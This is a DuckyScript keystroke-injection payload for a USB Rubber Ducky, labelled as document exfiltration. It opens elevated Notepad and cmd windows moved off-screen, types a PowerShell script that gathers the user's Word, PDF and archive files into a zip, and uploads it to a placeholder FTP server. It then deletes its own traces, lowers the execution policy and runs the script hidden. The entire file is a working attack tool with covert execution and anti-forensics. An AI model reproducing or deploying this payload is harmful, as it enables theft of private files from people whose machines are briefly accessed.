REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
REM Description: Exfiltrate documents and upload them to a ftp server.
REM Version: 1.0
REM Category: Exfiltration
DELAY 800
GUI r
DELAY 1000
STRING powershell Start-Process notepad -Verb runAs
ENTER
DELAY 800
ALT y
DELAY 800
ENTER
ALT SPACE
DELAY 1000
STRING m
DELAY 1000
DOWNARROW
REPEAT 100
ENTER
STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss')
ENTER
STRING $userDir = (Get-ChildItem env:\userprofile).value + '\Ducky Report ' + $folderDateTime
ENTER
STRING $fileSaveDir = New-Item  ($userDir) -ItemType Directory 
ENTER
STRING $date = get-date 
ENTER
STRING $style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>"
ENTER
STRING $Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo.html' 
ENTER
STRING $Report = $Report + "<div id=body><h1>Duck Tool Kit Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>" 
ENTER
STRING $Report =  $Report + '<div id=center><h3>User Documents (doc,docx,pdf,rar)</h3>' 
ENTER 
STRING $Report =  $Report + (Get-ChildItem -Path $userDir -Include *.doc, *.docx, *.pdf, *.zip, *.rar -Recurse |convertto-html Directory, Name, LastAccessTime) 
ENTER  
STRING $Report = $Report + '</div>' 
ENTER
STRING $Report >> $fileSaveDir'/ComputerInfo.html' 
ENTER
STRING function copy-ToZip($fileSaveDir){ 
ENTER 
STRING $srcdir = $fileSaveDir 
ENTER
STRING $zipFile = 'C:\Windows\Report.zip'
ENTER
STRING if(-not (test-path($zipFile))) { 
ENTER
STRING set-content $zipFile ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18))
ENTER 
STRING (dir $zipFile).IsReadOnly = $false} 
ENTER
STRING $shellApplication = new-object -com shell.application 
ENTER 
STRING $zipPackage = $shellApplication.NameSpace($zipFile) 
ENTER
STRING $files = Get-ChildItem -Path $srcdir 
ENTER 
STRING foreach($file in $files) { 
ENTER
STRING $zipPackage.CopyHere($file.FullName) 
ENTER 
STRING while($zipPackage.Items().Item($file.name) -eq $null){ 
ENTER
STRING Start-sleep -seconds 1 }}} 
ENTER 
STRING copy-ToZip($fileSaveDir) 
ENTER
STRING $final = 'C:\Windows\Report.zip'
ENTER
STRING $ftpAddr = "ftp://username:password@ftp.host.com/Report.zip"
ENTER
STRING $browser = New-Object System.Net.WebClient  
ENTER
STRING $url = New-Object System.Uri($ftpAddr)  
ENTER
STRING $browser.UploadFile($url, $final)  
ENTER
STRING remove-item $fileSaveDir -recurse 
ENTER
STRING remove-item 'C:\Windows\Report.zip'
ENTER
STRING Remove-Item $MyINvocation.InvocationName 
ENTER
CTRL s
DELAY 800  
STRING C:\Windows\config-58477.ps1
ENTER
DELAY 1000
ALT F4 
DELAY 800  
GUI r 
DELAY 800  
STRING powershell Start-Process cmd -Verb runAs 
ENTER
DELAY 800  
ALT y 
DELAY 1000
STRING mode con:cols=14 lines=1 
ENTER
ALT SPACE 
DELAY 800   
STRING m 
DELAY 1000
DOWNARROW 
REPEAT 100
ENTER
STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false 
ENTER 
DELAY 800  
STRING powershell.exe -windowstyle hidden -File C:\Windows\config-58477.ps1
ENTER